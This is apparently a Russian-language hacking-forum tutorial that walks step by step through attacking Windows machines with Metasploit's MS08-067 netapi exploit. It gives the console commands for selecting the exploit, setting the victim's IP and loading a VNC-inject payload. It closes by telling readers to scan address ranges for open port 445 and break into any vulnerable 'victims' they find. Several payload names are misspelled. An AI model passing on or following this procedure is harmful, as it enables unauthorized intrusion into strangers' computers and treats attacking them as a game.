В этой статье мы покажем на простом примере на что способен MSF. Для примера будем использовать MS08-067 netapi exploit. Также освоим основные команды.
Запускаем консоль :

Команда
show exploits показывает все доступные эксплоиты. Как видите выбирать есть из чего. Имеются эксплоиты под разные платформы: Windows, Linux, IIS, Apach и т.д :

Сейчас мы опишем процедуру выбора определенного эксплоита и его запуска. Команда
use [название эксплоита] активирует его рабочую среду. Мы будем использовать как пример MS08-067 netapi exploit.

Набираем : use windows/smb/ms08_067_netapi

Чтобы вернуться назад - используем команду
back.
Чтобы узнать больше инфы об эксплоите -
info.
Ну так значит, вот, мы и в рабочей среде эксплоита. Набираем
show options чтьб увидеть какие условия необходимо выполнить:

Этот эксплоит твебует введения трех параметров :
RHOST - IP адресс цели необходимо указать (остальные уже заполнены по умолчанию).
Набираем
set RHOST [IP адресс жертвы] :

Команда
show payloads выводит все начинки, которые можно использовать с данным эксплоитом.

Мы будем использовать начинку
windos/vncinject/bind_tcp
Набираем
set PAYLOAD windows/vcninject/bind_tcp
Если вы подозреваете, что на машине жертвы может стоять фаервол, тогда используем
windows/vcninject/
reverse_tcp.
Ну вот, все готово, теперь командуем
exploit или
run. Эта команда запускает выбранный и настроенный эксплоит против жертвы :

Ну вот и все - мы в компе у жертвы и можем делать все, что захотим... :)
Video [TuT] на инглише.
Уязвимость правда довольно старенькая, но тачки с ней еще встречаются, так что вперед сканим диапазоны на открытый 445 й порт. Удачи :)
$vz00r